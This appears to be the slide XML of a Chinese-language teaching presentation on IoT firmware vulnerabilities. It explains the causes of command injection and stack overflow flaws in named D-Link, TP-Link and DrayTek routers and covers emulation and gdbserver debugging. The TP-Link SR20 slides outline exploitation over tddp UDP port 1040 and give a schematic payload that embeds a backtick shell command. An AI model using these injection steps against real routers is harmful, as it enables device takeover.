        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1870710"/>
            <a:ext cx="7108825" cy="92202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DLINK DIR-859 upnp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议命令注入</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tplink sr20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路由器命令注入</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Draytek Vigor2960 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>前台登录处栈溢出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>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523875" y="2720340"/>
            <a:ext cx="8096885" cy="2107565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2745105"/>
            <a:ext cx="8359775" cy="2059305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="C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固件中常见安全漏洞</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>固件安全漏洞之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>拒绝服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1875155"/>
            <a:ext cx="7108825" cy="92202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在 IOT 设备固件中，拒绝服务漏洞通常是由于程序自身代码逻辑的缺陷导致的一类漏洞，这类漏洞一般都是由于内存操作方面的操作不当，造成空指针异常或者非法地址引用等问题进而导致设备服务崩溃或者设备重启。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="652780" y="2797175"/>
            <a:ext cx="4115435" cy="2045970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4818380" y="2797175"/>
            <a:ext cx="4250055" cy="181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altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TPLINK Sr20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路由器 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tddp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议命令注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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漏洞成因：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tddp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议服务对用户的输入没有进行有效的过滤，导致用户可以构造恶意的数据包造成命令注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="3130550"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838950" y="3130550"/>
            <a:ext cx="1428750" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4488180" y="3175635"/>
            <a:ext cx="3429635" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4725670" y="3062605"/>
            <a:ext cx="2211070" cy="275590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>\x01x31...`command`...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3575050" y="3658235"/>
            <a:ext cx="3327400" cy="369570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761365" y="4382135"/>
            <a:ext cx="2481580" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全客链接</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1906905" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统模式固件模拟</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>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219710" y="3115310"/>
            <a:ext cx="5895340" cy="1633855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="378460" y="2607945"/>
            <a:ext cx="2131695" cy="429895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3572510" y="1186180"/>
            <a:ext cx="5422265" cy="2007870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3576955" y="1205230"/>
            <a:ext cx="5429885" cy="205930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1906905" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4006215" y="2305685"/>
            <a:ext cx="5120005" cy="2502535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5975985" y="1937385"/>
            <a:ext cx="1425575" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sub_A580</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905" y="1937385"/>
            <a:ext cx="4292600" cy="2493645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767840" y="1186180"/>
            <a:ext cx="6971030" cy="2489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2423795" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gdbserver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>动态调试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5168265" y="1299845"/>
            <a:ext cx="3550285" cy="3540760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1669415"/>
            <a:ext cx="3861435" cy="3211195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3268980" y="922020"/>
            <a:ext cx="5449570" cy="3958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漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>连接 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tddp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议对应 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1040</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</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en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>并执行命令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4150360" y="1169670"/>
            <a:ext cx="4982845" cy="36918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altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TPLINK</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WR</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>841n 路由器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>后台</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>栈溢出</a:t>
            </a:r>
            <a:endParaRPr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漏洞成因：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>httpd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务中 stringModify 函数没有对转移义后的字符串长度进行有效判断，导致最后的字符串复制到目标栈内存空间中，其长度超过当前栈空间的大小，发生栈溢出。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A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17517" y="774802"/>
            <a:ext cx="4215130" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>目  录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3224530" y="1454150"/>
            <a:ext cx="4407535" cy="572135"/>
            <a:chOff x="4448" y="2628"/>
            <a:chExt cx="6941" cy="901"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4" descr="PPT调整"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4448" y="2628"/>
              <a:ext cx="6941" cy="610"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 5"/>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01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="文本框 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5941" y="2658"/>
              <a:ext cx="4861" cy="871"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>固件安全概述</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3224530" y="1990090"/>
            <a:ext cx="4407535" cy="572135"/>
            <a:chOff x="4448" y="2628"/>
            <a:chExt cx="6941" cy="901"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="图片 24" descr="PPT调整"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4448" y="2628"/>
              <a:ext cx="6941" cy="610"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="文本框 25"/>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02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="文本框 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5941" y="2658"/>
              <a:ext cx="4861" cy="871"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1500" dirty="0">
                  <a:solidFill>
